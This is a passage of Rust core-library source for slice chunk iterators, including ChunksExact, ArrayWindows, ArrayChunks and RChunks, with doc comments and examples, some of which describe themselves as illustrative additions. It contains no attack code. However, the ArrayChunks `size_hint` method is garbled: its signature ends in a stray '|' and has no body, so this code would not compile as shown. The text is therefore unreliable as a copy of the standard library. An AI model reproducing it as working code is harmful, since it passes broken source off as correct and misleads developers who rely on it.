// slice to be mutable.
unsafe { from_raw_parts_mut(self.v.as_mut_ptr().add(start), end - start) }
}
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a, T> DoubleEndedIterator for ChunksMut<'a, T> {
#[inline]
fn next_back(&mut self) -> Option<&'a mut [T]> {
if self.v.is_empty() {
None
} else {
let remainder = self.v.len() % self.chunk_size;
let sz = if remainder != 0 { remainder } else { self.chunk_size };
let tmp = mem::replace(&mut self.v, &mut []);
let tmp_len = tmp.len();
let (head, tail) = tmp.split_at_mut(tmp_len - sz);
self.v = head;
Some(tail)
}
}
#[inline]
fn nth_back(&mut self, n: usize) -> Option<Self::Item> {
let len = self.len();
if n >= len {
self.v = &mut [];
None
} else {
let start = (len - 1 - n) * self.chunk_size;
let end = match start.checked_add(self.chunk_size) {
Some(res) => cmp::min(res, self.v.len()),
None => self.v.len(),
};
let (temp, _tail) = mem::replace(&mut self.v, &mut []).split_at_mut(end);
let (head, nth_back) = temp.split_at_mut(start);
self.v = head;
Some(nth_back)
}
}
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<T> ExactSizeIterator for ChunksMut<'_, T> {}
#[unstable(feature = "trusted_len", issue = "37572")]
unsafe impl<T> TrustedLen for ChunksMut<'_, T> {}
#[stable(feature = "fused", since = "1.26.0")]
impl<T> FusedIterator for ChunksMut<'_, T> {}
#[doc(hidden)]
#[unstable(feature = "trusted_random_access", issue = "none")]
unsafe impl<'a, T> TrustedRandomAccess for ChunksMut<'a, T> {
fn may_have_side_effect() -> bool {
false
}
}
/// An iterator over a slice in (non-overlapping) chunks (`chunk_size` elements at a
/// time), starting at the beginning of the slice.
///
/// When the slice len is not evenly divided by the chunk size, the last
/// up to `chunk_size-1` elements will be omitted but can be retrieved via
/// the [`remainder`] method on the iterator.
///
/// This struct is created by the [`chunks_exact`] method on [slices].
///
/// # Example
///
/// ```
/// let slice = ['l', 'o', 'r', 'e', 'm'];
/// let mut iter = slice.chunks_exact(2);
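/// // Only complete chunks are yielded; the leftover element is exposed
/// // separately through `remainder`:
/// assert_eq!(iter.next(), Some(&['l', 'o'][..]));
/// assert_eq!(iter.next(), Some(&['r', 'e'][..]));
/// assert_eq!(iter.next(), None);
/// assert_eq!(iter.remainder(), &['m']);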
/// ```
///
/// [`chunks_exact`]: ../../std/primitive.slice.html#method.chunks_exact
/// [`remainder`]: ChunksExact::remainder
/// [slices]: ../../std/primitive.slice.html
#[derive(Debug)]
#[stable(feature = "chunks_exact", since = "1.31.0")]
pub struct ChunksExact<'a, T: 'a> {
v: &'a [T],
rem: &'a [T],
chunk_size: usize,
}
impl<'a, T> ChunksExact<'a, T> {
#[inline]
pub(super) fn new(slice: &'a [T], chunk_size: usize) -> Self {
let rem = slice.len() % chunk_size;
let fst_len = slice.len() - rem;
// SAFETY: 0 <= fst_len <= slice.len() by construction above
let (fst, snd) = unsafe { slice.split_at_unchecked(fst_len) };
Self { v: fst, rem: snd, chunk_size }
}
/// Returns the remainder of the original slice that is not going to be
/// returned by the iterator. The returned slice has at most `chunk_size-1`
/// elements.
#[stable(feature = "chunks_exact", since = "1.31.0")]
pub fn remainder(&self) -> &'a [T] {
self.rem
}
}
// FIXME(#26925) Remove in favor of `#[derive(Clone)]`
#[stable(feature = "chunks_exact", since = "1.31.0")]
impl<T> Clone for ChunksExact<'_, T> {
fn clone(&self) -> Self {
ChunksExact { v: self.v, rem: self.rem, chunk_size: self.chunk_size }
}
}
#[stable(feature = "chunks_exact", since = "1.31.0")]
impl<'a, T> Iterator for ChunksExact<'a, T> {
type Item = &'a [T];
#[inline]
fn next(&mut self) -> Option<&'a [T]> {
if self.v.len() < self.chunk_size {
None
} else {
let (fst, snd) = self.v.split_at(self.chunk_size);
self.v = snd;
Some(fst)
}
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
let n = self.v.len() / self.chunk_size;
(n, Some(n))
}
#[inline]
fn count(self) -> usize {
self.len()
}
#[inline]
fn nth(&mut self, n: usize) -> Option<Self::Item> {
let (start, overflow) = n.overflowing_mul(self.chunk_size);
if start >= self.v.len() || overflow {
self.v = &[];
None
} else {
let (_, snd) = self.v.split_at(start);
self.v = snd;
self.next()
}
}
#[inline]
fn last(mut self) -> Option<Self::Item> {
self.next_back()
}
#[doc(hidden)]
unsafe fn __iterator_get_unchecked(&mut self, idx: usize) -> Self::Item {
let start = idx * self.chunk_size;
// SAFETY: mostly identical to `Chunks::__iterator_get_unchecked`.
unsafe { from_raw_parts(self.v.as_ptr().add(start), self.chunk_size) }
}
}
#[stable(feature = "chunks_exact", since = "1.31.0")]
impl<'a, T> DoubleEndedIterator for ChunksExact<'a, T> {
#[inline]
fn next_back(&mut self) -> Option<&'a [T]> {
if self.v.len() < self.chunk_size {
None
} else {
let (fst, snd) = self.v.split_at(self.v.len() - self.chunk_size);
self.v = fst;
Some(snd)
}
}
#[inline]
fn nth_back(&mut self, n: usize) -> Option<Self::Item> {
let len = self.len();
if n >= len {
self.v = &[];
None
} else {
let start = (len - 1 - n) * self.chunk_size;
let end = start + self.chunk_size;
let nth_back = &self.v[start..end];
self.v = &self.v[..start];
Some(nth_back)
}
}
}
#[stable(feature = "chunks_exact", since = "1.31.0")]
impl<T> ExactSizeIterator for ChunksExact<'_, T> {
fn is_empty(&self) -> bool {
self.v.is_empty()
}
}
#[unstable(feature = "trusted_len", issue = "37572")]
unsafe impl<T> TrustedLen for ChunksExact<'_, T> {}
#[stable(feature = "chunks_exact", since = "1.31.0")]
impl<T> FusedIterator for ChunksExact<'_, T> {}
#[doc(hidden)]
#[unstable(feature = "trusted_random_access", issue = "none")]
unsafe impl<'a, T> TrustedRandomAccess for ChunksExact<'a, T> {
fn may_have_side_effect() -> bool {
false
}
}
/// An iterator over a slice in (non-overlapping) mutable chunks (`chunk_size`
/// elements at a time), starting at the beginning of the slice.
///
/// When the slice len is not evenly divided by the chunk size, the last up to
/// `chunk_size-1` elements will be omitted but can be retrieved via the
/// [`into_remainder`] method on the iterator.
///
/// This struct is created by the [`chunks_exact_mut`] method on [slices].
///
/// # Example
///
/// ```
/// let mut slice = ['l', 'o', 'r', 'e', 'm'];
/// let iter = slice.chunks_exact_mut(2);
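/// // Only complete chunks are yielded mutably; the leftover `'m'` stays
/// // untouched in the remainder:
/// for chunk in iter {
///     chunk[1] = chunk[0];
/// }
/// assert_eq!(slice, ['l', 'l', 'r', 'r', 'm']);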
/// ```
///
/// [`chunks_exact_mut`]: ../../std/primitive.slice.html#method.chunks_exact_mut
/// [`into_remainder`]: ChunksExactMut::into_remainder
/// [slices]: ../../std/primitive.slice.html
#[derive(Debug)]
#[stable(feature = "chunks_exact", since = "1.31.0")]
pub struct ChunksExactMut<'a, T: 'a> {
v: &'a mut [T],
rem: &'a mut [T],
chunk_size: usize,
}
impl<'a, T> ChunksExactMut<'a, T> {
#[inline]
pub(super) fn new(slice: &'a mut [T], chunk_size: usize) -> Self {
let rem = slice.len() % chunk_size;
let fst_len = slice.len() - rem;
// SAFETY: 0 <= fst_len <= slice.len() by construction above
let (fst, snd) = unsafe { slice.split_at_mut_unchecked(fst_len) };
Self { v: fst, rem: snd, chunk_size }
}
/// Returns the remainder of the original slice that is not going to be
/// returned by the iterator. The returned slice has at most `chunk_size-1`
/// elements.
#[stable(feature = "chunks_exact", since = "1.31.0")]
pub fn into_remainder(self) -> &'a mut [T] {
self.rem
}
}
#[stable(feature = "chunks_exact", since = "1.31.0")]
impl<'a, T> Iterator for ChunksExactMut<'a, T> {
type Item = &'a mut [T];
#[inline]
fn next(&mut self) -> Option<&'a mut [T]> {
if self.v.len() < self.chunk_size {
None
} else {
let tmp = mem::replace(&mut self.v, &mut []);
let (head, tail) = tmp.split_at_mut(self.chunk_size);
self.v = tail;
Some(head)
}
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
let n = self.v.len() / self.chunk_size;
(n, Some(n))
}
#[inline]
fn count(self) -> usize {
self.len()
}
#[inline]
fn nth(&mut self, n: usize) -> Option<&'a mut [T]> {
let (start, overflow) = n.overflowing_mul(self.chunk_size);
if start >= self.v.len() || overflow {
self.v = &mut [];
None
} else {
let tmp = mem::replace(&mut self.v, &mut []);
let (_, snd) = tmp.split_at_mut(start);
self.v = snd;
self.next()
}
}
#[inline]
fn last(mut self) -> Option<Self::Item> {
self.next_back()
}
#[doc(hidden)]
unsafe fn __iterator_get_unchecked(&mut self, idx: usize) -> Self::Item {
let start = idx * self.chunk_size;
// SAFETY: see comments for `ChunksMut::__iterator_get_unchecked`.
unsafe { from_raw_parts_mut(self.v.as_mut_ptr().add(start), self.chunk_size) }
}
}
#[stable(feature = "chunks_exact", since = "1.31.0")]
impl<'a, T> DoubleEndedIterator for ChunksExactMut<'a, T> {
#[inline]
fn next_back(&mut self) -> Option<&'a mut [T]> {
if self.v.len() < self.chunk_size {
None
} else {
let tmp = mem::replace(&mut self.v, &mut []);
let tmp_len = tmp.len();
let (head, tail) = tmp.split_at_mut(tmp_len - self.chunk_size);
self.v = head;
Some(tail)
}
}
#[inline]
fn nth_back(&mut self, n: usize) -> Option<Self::Item> {
let len = self.len();
if n >= len {
self.v = &mut [];
None
} else {
let start = (len - 1 - n) * self.chunk_size;
let end = start + self.chunk_size;
let (temp, _tail) = mem::replace(&mut self.v, &mut []).split_at_mut(end);
let (head, nth_back) = temp.split_at_mut(start);
self.v = head;
Some(nth_back)
}
}
}
#[stable(feature = "chunks_exact", since = "1.31.0")]
impl<T> ExactSizeIterator for ChunksExactMut<'_, T> {
fn is_empty(&self) -> bool {
self.v.is_empty()
}
}
#[unstable(feature = "trusted_len", issue = "37572")]
unsafe impl<T> TrustedLen for ChunksExactMut<'_, T> {}
#[stable(feature = "chunks_exact", since = "1.31.0")]
impl<T> FusedIterator for ChunksExactMut<'_, T> {}
#[doc(hidden)]
#[unstable(feature = "trusted_random_access", issue = "none")]
unsafe impl<'a, T> TrustedRandomAccess for ChunksExactMut<'a, T> {
fn may_have_side_effect() -> bool {
false
}
}
/// A windowed iterator over a slice in overlapping chunks (`N` elements at a
/// time), starting at the beginning of the slice.
///
/// This struct is created by the [`array_windows`] method on [slices].
///
/// # Example
///
/// ```
/// #![feature(array_windows)]
///
/// let slice = [0, 1, 2, 3];
/// let mut iter = slice.array_windows::<2>();
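/// // Unlike `windows`, each item is a reference to an array of a
/// // compile-time-known size:
/// assert_eq!(iter.next(), Some(&[0, 1]));
/// assert_eq!(iter.next(), Some(&[1, 2]));
/// assert_eq!(iter.next(), Some(&[2, 3]));
/// assert_eq!(iter.next(), None);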
/// ```
///
/// [`array_windows`]: ../../std/primitive.slice.html#method.array_windows
/// [slices]: ../../std/primitive.slice.html
#[derive(Debug, Clone, Copy)]
#[unstable(feature = "array_windows", issue = "75027")]
pub struct ArrayWindows<'a, T: 'a, const N: usize> {
slice_head: *const T,
num: usize,
marker: PhantomData<&'a [T; N]>,
}
impl<'a, T: 'a, const N: usize> ArrayWindows<'a, T, N> {
#[inline]
pub(super) fn new(slice: &'a [T]) -> Self {
let num_windows = slice.len().saturating_sub(N - 1);
Self { slice_head: slice.as_ptr(), num: num_windows, marker: PhantomData }
}
}
#[unstable(feature = "array_windows", issue = "75027")]
impl<'a, T, const N: usize> Iterator for ArrayWindows<'a, T, N> {
type Item = &'a [T; N];
#[inline]
fn next(&mut self) -> Option<Self::Item> {
if self.num == 0 {
return None;
}
// SAFETY:
// This is safe because it's indexing into a slice guaranteed to have length >= N.
let ret = unsafe { &*self.slice_head.cast::<[T; N]>() };
// SAFETY: Guaranteed that there is at least 1 item remaining, otherwise the
// earlier branch would have been hit.
self.slice_head = unsafe { self.slice_head.add(1) };
self.num -= 1;
Some(ret)
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
(self.num, Some(self.num))
}
#[inline]
fn count(self) -> usize {
self.num
}
#[inline]
fn nth(&mut self, n: usize) -> Option<Self::Item> {
if self.num <= n {
self.num = 0;
return None;
}
// SAFETY:
// This is safe because it's indexing into a slice guaranteed to have at least `n + N` elements.
let ret = unsafe { &*self.slice_head.add(n).cast::<[T; N]>() };
// SAFETY: Guaranteed that there are at least n items remaining
self.slice_head = unsafe { self.slice_head.add(n + 1) };
self.num -= n + 1;
Some(ret)
}
#[inline]
fn last(mut self) -> Option<Self::Item> {
self.nth(self.num.checked_sub(1)?)
}
}
#[unstable(feature = "array_windows", issue = "75027")]
impl<'a, T, const N: usize> DoubleEndedIterator for ArrayWindows<'a, T, N> {
#[inline]
fn next_back(&mut self) -> Option<&'a [T; N]> {
if self.num == 0 {
return None;
}
// SAFETY: `self.num >= 1` here, so the last window, starting at offset `self.num - 1`, is in bounds.
let ret = unsafe { &*self.slice_head.add(self.num - 1).cast::<[T; N]>() };
self.num -= 1;
Some(ret)
}
#[inline]
fn nth_back(&mut self, n: usize) -> Option<&'a [T; N]> {
if self.num <= n {
self.num = 0;
return None;
}
// SAFETY: `self.num > n` here, so the window starting at offset `self.num - (n + 1)` is in bounds.
let ret = unsafe { &*self.slice_head.add(self.num - (n + 1)).cast::<[T; N]>() };
self.num -= n + 1;
Some(ret)
}
}
#[unstable(feature = "array_windows", issue = "75027")]
impl<T, const N: usize> ExactSizeIterator for ArrayWindows<'_, T, N> {
fn is_empty(&self) -> bool {
self.num == 0
}
}
/// An iterator over a slice in (non-overlapping) chunks (`N` elements at a
/// time), starting at the beginning of the slice.
///
/// When the slice len is not evenly divided by the chunk size, the last
/// up to `N-1` elements will be omitted but can be retrieved via
/// the [`remainder`] method on the iterator.
///
/// This struct is created by the [`array_chunks`] method on [slices].
///
/// # Example
///
/// ```
/// #![feature(array_chunks)]
///
/// let slice = ['l', 'o', 'r', 'e', 'm'];
/// let mut iter = slice.array_chunks::<2>();
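/// // Each item is an array reference; the leftover element is exposed
/// // through `remainder`:
/// assert_eq!(iter.next(), Some(&['l', 'o']));
/// assert_eq!(iter.next(), Some(&['r', 'e']));
/// assert_eq!(iter.next(), None);
/// assert_eq!(iter.remainder(), &['m']);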
/// ```
///
/// [`array_chunks`]: ../../std/primitive.slice.html#method.array_chunks
/// [`remainder`]: ArrayChunks::remainder
/// [slices]: ../../std/primitive.slice.html
#[derive(Debug)]
#[unstable(feature = "array_chunks", issue = "74985")]
pub struct ArrayChunks<'a, T: 'a, const N: usize> {
iter: Iter<'a, [T; N]>,
rem: &'a [T],
}
impl<'a, T, const N: usize> ArrayChunks<'a, T, N> {
#[inline]
pub(super) fn new(slice: &'a [T]) -> Self {
let len = slice.len() / N;
let (fst, snd) = slice.split_at(len * N);
// SAFETY: We cast a slice of `len * N` elements into
// a slice of `len` many `N` elements chunks.
let array_slice: &[[T; N]] = unsafe { from_raw_parts(fst.as_ptr().cast(), len) };
Self { iter: array_slice.iter(), rem: snd }
}
/// Returns the remainder of the original slice that is not going to be
/// returned by the iterator. The returned slice has at most `N-1`
/// elements.
#[unstable(feature = "array_chunks", issue = "74985")]
pub fn remainder(&self) -> &'a [T] {
self.rem
}
}
// FIXME(#26925) Remove in favor of `#[derive(Clone)]`
#[unstable(feature = "array_chunks", issue = "74985")]
impl<T, const N: usize> Clone for ArrayChunks<'_, T, N> {
fn clone(&self) -> Self {
ArrayChunks { iter: self.iter.clone(), rem: self.rem }
}
}
#[unstable(feature = "array_chunks", issue = "74985")]
impl<'a, T, const N: usize> Iterator for ArrayChunks<'a, T, N> {
type Item = &'a [T; N];
#[inline]
fn next(&mut self) -> Option<&'a [T; N]> {
self.iter.next()
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) |
#[inline]
fn count(self) -> usize {
self.iter.count()
}
#[inline]
fn nth(&mut self, n: usize) -> Option<Self::Item> {
self.iter.nth(n)
}
#[inline]
fn last(self) -> Option<Self::Item> {
self.iter.last()
}
unsafe fn __iterator_get_unchecked(&mut self, i: usize) -> &'a [T; N] {
// SAFETY: The safety guarantees of `__iterator_get_unchecked` are
// transferred to the caller.
unsafe { self.iter.__iterator_get_unchecked(i) }
}
}
#[unstable(feature = "array_chunks", issue = "74985")]
impl<'a, T, const N: usize> DoubleEndedIterator for ArrayChunks<'a, T, N> {
#[inline]
fn next_back(&mut self) -> Option<&'a [T; N]> {
self.iter.next_back()
}
#[inline]
fn nth_back(&mut self, n: usize) -> Option<Self::Item> {
self.iter.nth_back(n)
}
}
#[unstable(feature = "array_chunks", issue = "74985")]
impl<T, const N: usize> ExactSizeIterator for ArrayChunks<'_, T, N> {
fn is_empty(&self) -> bool {
self.iter.is_empty()
}
}
#[unstable(feature = "trusted_len", issue = "37572")]
unsafe impl<T, const N: usize> TrustedLen for ArrayChunks<'_, T, N> {}
#[unstable(feature = "array_chunks", issue = "74985")]
impl<T, const N: usize> FusedIterator for ArrayChunks<'_, T, N> {}
#[doc(hidden)]
#[unstable(feature = "array_chunks", issue = "74985")]
unsafe impl<'a, T, const N: usize> TrustedRandomAccess for ArrayChunks<'a, T, N> {
fn may_have_side_effect() -> bool {
false
}
}
/// An iterator over a slice in (non-overlapping) mutable chunks (`N` elements
/// at a time), starting at the beginning of the slice.
///
/// When the slice len is not evenly divided by the chunk size, the last
/// up to `N-1` elements will be omitted but can be retrieved from
/// the [`into_remainder`] function from the iterator.
///
/// This struct is created by the [`array_chunks_mut`] method on [slices].
///
/// # Example
///
/// ```
/// #![feature(array_chunks)]
///
/// let mut slice = ['l', 'o', 'r', 'e', 'm'];
/// let iter = slice.array_chunks_mut::<2>();
/// ```
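///
/// A sketch of typical use (an illustrative addition, assuming the unstable
/// `array_chunks` feature): the first element of each full chunk is bumped,
/// while the remainder is left untouched.
///
/// ```
/// #![feature(array_chunks)]
///
/// let mut slice = [1, 2, 3, 4, 5];
/// for chunk in slice.array_chunks_mut::<2>() {
///     chunk[0] += 10;
/// }
/// assert_eq!(slice, [11, 2, 13, 4, 5]);
/// ```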
///
/// [`array_chunks_mut`]: ../../std/primitive.slice.html#method.array_chunks_mut
/// [`into_remainder`]: ArrayChunksMut::into_remainder
/// [slices]: ../../std/primitive.slice.html
#[derive(Debug)]
#[unstable(feature = "array_chunks", issue = "74985")]
pub struct ArrayChunksMut<'a, T: 'a, const N: usize> {
iter: IterMut<'a, [T; N]>,
rem: &'a mut [T],
}
impl<'a, T, const N: usize> ArrayChunksMut<'a, T, N> {
#[inline]
pub(super) fn new(slice: &'a mut [T]) -> Self {
let len = slice.len() / N;
let (fst, snd) = slice.split_at_mut(len * N);
// SAFETY: We cast a slice of `len * N` elements into
// a slice of `len` many `N` elements chunks.
        let array_slice: &mut [[T; N]] = unsafe { from_raw_parts_mut(fst.as_mut_ptr().cast(), len) };
        Self { iter: array_slice.iter_mut(), rem: snd }
}
/// Returns the remainder of the original slice that is not going to be
/// returned by the iterator. The returned slice has at most `N-1`
/// elements.
#[unstable(feature = "array_chunks", issue = "74985")]
pub fn into_remainder(self) -> &'a mut [T] {
self.rem
}
}
#[unstable(feature = "array_chunks", issue = "74985")]
impl<'a, T, const N: usize> Iterator for ArrayChunksMut<'a, T, N> {
type Item = &'a mut [T; N];
#[inline]
fn next(&mut self) -> Option<&'a mut [T; N]> {
self.iter.next()
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
self.iter.size_hint()
}
#[inline]
fn count(self) -> usize {
self.iter.count()
}
#[inline]
fn nth(&mut self, n: usize) -> Option<Self::Item> {
self.iter.nth(n)
}
#[inline]
fn last(self) -> Option<Self::Item> {
self.iter.last()
}
unsafe fn __iterator_get_unchecked(&mut self, i: usize) -> &'a mut [T; N] {
// SAFETY: The safety guarantees of `__iterator_get_unchecked` are transferred to
// the caller.
unsafe { self.iter.__iterator_get_unchecked(i) }
}
}
#[unstable(feature = "array_chunks", issue = "74985")]
impl<'a, T, const N: usize> DoubleEndedIterator for ArrayChunksMut<'a, T, N> {
#[inline]
fn next_back(&mut self) -> Option<&'a mut [T; N]> {
self.iter.next_back()
}
#[inline]
fn nth_back(&mut self, n: usize) -> Option<Self::Item> {
self.iter.nth_back(n)
}
}
#[unstable(feature = "array_chunks", issue = "74985")]
impl<T, const N: usize> ExactSizeIterator for ArrayChunksMut<'_, T, N> {
fn is_empty(&self) -> bool {
self.iter.is_empty()
}
}
#[unstable(feature = "trusted_len", issue = "37572")]
unsafe impl<T, const N: usize> TrustedLen for ArrayChunksMut<'_, T, N> {}
#[unstable(feature = "array_chunks", issue = "74985")]
impl<T, const N: usize> FusedIterator for ArrayChunksMut<'_, T, N> {}
#[doc(hidden)]
#[unstable(feature = "array_chunks", issue = "74985")]
unsafe impl<'a, T, const N: usize> TrustedRandomAccess for ArrayChunksMut<'a, T, N> {
fn may_have_side_effect() -> bool {
false
}
}
/// An iterator over a slice in (non-overlapping) chunks (`chunk_size` elements at a
/// time), starting at the end of the slice.
///
/// When the slice len is not evenly divided by the chunk size, the last slice
/// of the iteration will be the remainder.
///
/// This struct is created by the [`rchunks`] method on [slices].
///
/// # Example
///
/// ```
/// let slice = ['l', 'o', 'r', 'e', 'm'];
/// let iter = slice.rchunks(2);
/// ```
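///
/// Continuing the example above (an illustrative addition), the chunks are
/// produced back-to-front, with the remainder arriving last:
///
/// ```
/// let slice = ['l', 'o', 'r', 'e', 'm'];
/// let mut iter = slice.rchunks(2);
/// assert_eq!(iter.next(), Some(&['e', 'm'][..]));
/// assert_eq!(iter.next(), Some(&['o', 'r'][..]));
/// assert_eq!(iter.next(), Some(&['l'][..]));
/// assert_eq!(iter.next(), None);
/// ```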
///
/// [`rchunks`]: ../../std/primitive.slice.html#method.rchunks
/// [slices]: ../../std/primitive.slice.html
#[derive(Debug)]
#[stable(feature = "rchunks", since = "1.31.0")]
pub struct RChunks<'a, T: 'a> {
v: &'a [T],
chunk_size: usize,
}
impl<'a, T: 'a> RChunks<'a, T> {
#[inline]
pub(super) fn new(slice: &'a [T], size: usize) -> Self {
Self { v: slice, chunk_size: size }
}
}
// FIXME(#26925) Remove in favor of `#[derive(Clone)]`
#[stable(feature = "rchunks", since = "1.31.0")]
impl<T> Clone for RChunks<'_, T> {
fn clone(&self) -> Self {
RChunks { v: self.v, chunk_size: self.chunk_size }
}
}
#[stable(feature = "rchunks", since = "1.31.0")]
impl<'a, T> Iterator for RChunks<'a, T> {
type Item = &'a [T];
#[inline]
fn next(&mut self) -> Option<&'a [T]> {
if self.v.is_empty() {
None
} else {
let chunksz = cmp::min(self.v.len(), self.chunk_size);
let (fst, snd) = self.v.split_at(self.v.len() - chunksz);
self.v = fst;
Some(snd)
}
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
if self.v.is_empty() {
(0, Some(0))
} else {
let n = self.v.len() / self.chunk_size;
let rem = self.v.len() % self.chunk_size;
let n = if rem > 0 { n + 1 } else { n };
(n, Some(n))
}
}
#[inline]
fn count(self) -> usize {
self.len()
}
#[inline]
fn nth(&mut self, n: usize) -> Option<Self::Item> {
let (end, overflow) = n.overflowing_mul(self.chunk_size);
if end >= self.v.len() || overflow {
self.v = &[];
None
} else {
// Can't underflow because of the check above
let end = self.v.len() - end;
let start = match end.checked_sub(self.chunk_size) {
Some(sum) => sum,
None => 0,
};
let nth = &self.v[start..end];
self.v = &self.v[0..start];
Some(nth)
}
}
#[inline]
fn last(self) -> Option<Self::Item> {
if self.v.is_empty() {
None
} else {
let rem = self.v.len() % self.chunk_size;
let end = if rem == 0 { self.chunk_size } else { rem };
Some(&self.v[0..end])
}
}
#[doc(hidden)]
unsafe fn __iterator_get_unchecked(&mut self, idx: usize) -> Self::Item {
let end = self.v.len() - idx * self.chunk_size;
let start = match end.checked_sub(self.chunk_size) {
None => 0,
Some(start) => start,
};
// SAFETY: mostly identical to `Chunks::__iterator_get_unchecked`.
unsafe { from_raw_parts(self.v.as_ptr().add(start), end - start) }
}
}
#[stable(feature = "rchunks", since = "1.31.0")]
impl<'a, T> DoubleEndedIterator for RChunks<'a, T> {
#[inline]
fn next_back(&mut self) -> Option<&'a [T]> {
if self.v.is_empty() {
None
} else {
let remainder = self.v.len() % self.chunk_size;
let chunksz = if remainder != 0 { remainder } else { self.chunk_size };
let (fst, snd) = self.v.split_at(chunksz);
self.v = snd;
Some(fst)
}
}
#[inline]
fn nth_back(&mut self, n: usize) -> Option<Self::Item> {
let len = self.len();
if n >= len {
self.v = &[];
None
} else {
// can't underflow because `n < len`
let offset_from_end = (len - 1 - n) * self.chunk_size;
let end = self.v.len() - offset_from_end;
let start = end.saturating_sub(self.chunk_size);
let nth_back = &self.v[start..end];
self.v = &self.v[end..];
Some(nth_back)
}
}
}
#[stable(feature = "rchunks", since = "1.31.0")]
impl<T> ExactSizeIterator for RChunks<'_, T> {}
#[unstable(feature = "trusted_len", issue = "37572")]
unsafe impl<T> TrustedLen for RChunks<'_, T> {}
#[stable(feature = "rchunks", since = "1.31.0")]
impl<T> FusedIterator for RChunks<'_, T> {}
#[doc(hidden)]
#[unstable(feature = "trusted_random_access", issue = "none")]
unsafe impl<'a, T> TrustedRandomAccess for RChunks<'a, T> {
fn may_have_side_effect() -> bool {
false
}
}
/// An iterator over a slice in (non-overlapping) mutable chunks (`chunk_size`
/// elements at a time), starting at the end of the slice.
///
/// When the slice len is not evenly divided by the chunk size, the last slice
/// of the iteration will be the remainder.
///
/// This struct is created by the [`rchunks_mut`] method on [slices].
///
/// # Example
///
/// ```
/// let mut slice = ['l', 'o', 'r', 'e', 'm'];
/// let iter = slice.rchunks_mut(2);
/// ```
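///
/// A sketch of typical use (an illustrative addition): chunks are handed out
/// from the back, so the lone remainder chunk here is `[1]`.
///
/// ```
/// let mut slice = [1, 2, 3, 4, 5];
/// for chunk in slice.rchunks_mut(2) {
///     chunk[0] += 10;
/// }
/// assert_eq!(slice, [11, 12, 3, 14, 5]);
/// ```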
///
/// [`rchunks_mut`]: ../../std/primitive.slice.html#method.rchunks_mut
/// [slices]: ../../std/primitive.slice.html
#[derive(Debug)]
#[stable(feature = "rchunks", since = "1.31.0")]
pub struct RChunksMut<'a, T: 'a> {
v: &'a mut [T],
chunk_size: usize,
}
impl<'a, T: 'a> RChunksMut<'a, T> {
#[inline]
pub(super) fn new(slice: &'a mut [T], size: usize) -> Self {
Self { v: slice, chunk_size: size }
}
}
#[stable(feature = "rchunks", since = "1.31.0")]
impl<'a, T> Iterator for RChunksMut<'a, T> {
type Item = &'a mut [T];
#[inline]
fn next(&mut self) -> Option<&'a mut [T]> {
if self.v.is_empty() {
None
} else {
let sz = cmp::min(self.v.len(), self.chunk_size);
let tmp = mem::replace(&mut self.v, &mut []);
let tmp_len = tmp.len();
let (head, tail) = tmp.split_at_mut(tmp_len - sz);
self.v = head;
Some(tail)
}
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
if self.v.is_empty() {
(0, Some(0))
} else {
let n = self.v.len() / self.chunk_size;
let rem = self.v.len() % self.chunk_size;
let n = if rem > 0 { n + 1 } else { n };
(n, Some(n))
}
}
#[inline]
fn count(self) -> usize {
self.len()
}
#[inline]
fn nth(&mut self, n: usize) -> Option<&'a mut [T]> {
let (end, overflow) = n.overflowing_mul(self.chunk_size);
if end >= self.v.len() || overflow {
self.v = &mut [];
None
} else {
// Can't underflow because of the check above
let end = self.v.len() - end;
let start = match end.checked_sub(self.chunk_size) {
Some(sum) => sum,
None => 0,
};
let tmp = mem::replace(&mut self.v, &mut []);
let (head, tail) = tmp.split_at_mut(start);
let (nth, _) = tail.split_at_mut(end - start);
self.v = head;
Some(nth)
}
}
#[inline]
fn last(self) -> Option<Self::Item> {
if self.v.is_empty() {
None
} else {
let rem = self.v.len() % self.chunk_size;
let end = if rem == 0 { self.chunk_size } else { rem };
Some(&mut self.v[0..end])
}
}
#[doc(hidden)]
unsafe fn __iterator_get_unchecked(&mut self, idx: usize) -> Self::Item {
let end = self.v.len() - idx * self.chunk_size;
let start = match end.checked_sub(self.chunk_size) {
None => 0,
Some(start) => start,
};
// SAFETY: see comments for `RChunks::__iterator_get_unchecked` and
// `ChunksMut::__iterator_get_unchecked`
unsafe { from_raw_parts_mut(self.v.as_mut_ptr().add(start), end - start) }
}
}
#[stable(feature = "rchunks", since = "1.31.0")]
impl<'a, T> DoubleEndedIterator for RChunksMut<'a, T> {
#[inline]
fn next_back(&mut self) -> Option<&'a mut [T]> {
if self.v.is_empty() {
None
} else {
let remainder = self.v.len() % self.chunk_size;
let sz = if remainder != 0 { remainder } else { self.chunk_size };
let tmp = mem::replace(&mut self.v, &mut []);
let (head, tail) = tmp.split_at_mut(sz);
self.v = tail;
Some(head)
}
}
#[inline]
fn nth_back(&mut self, n: usize) -> Option<Self::Item> {
let len = self.len();
if n >= len {
self.v = &mut [];
None
} else {
// can't underflow because `n < len`
let offset_from_end = (len - 1 - n) * self.chunk_size;
let end = self.v.len() - offset_from_end;
let start = end.saturating_sub(self.chunk_size);
let (tmp, tail) = mem::replace(&mut self.v, &mut []).split_at_mut(end);
let (_, nth_back) = tmp.split_at_mut(start);
self.v = tail;
Some(nth_back)
}
}
}
#[stable(feature = "rchunks", since = "1.31.0")]
impl<T> ExactSizeIterator for RChunksMut<'_, T> {}
#[unstable(feature = "trusted_len", issue = "37572")]
unsafe impl<T> TrustedLen for RChunksMut<'_, T> {}
#[stable(feature = "rchunks", since = "1.31.0")]
impl<T> FusedIterator for RChunksMut<'_, T> {}
#[doc(hidden)]
#[unstable(feature = "trusted_random_access", issue = "none")]
unsafe impl<'a, T> TrustedRandomAccess for RChunksMut<'a, T> {
fn may_have_side_effect() -> bool {
false
}
}
/// An iterator over a slice in (non-overlapping) chunks (`chunk_size` elements at a
/// time), starting at the end of the slice.
///
/// When the slice len is not evenly divided by the chunk size, the last
/// up to `chunk_size-1` elements will be omitted but can be retrieved from
/// the [`remainder`] function from the iterator.
///
/// This struct is created by the [`rchunks_exact`] method on [slices].
///
/// # Example
///
/// ```
/// let slice = ['l', 'o', 'r', 'e', 'm'];
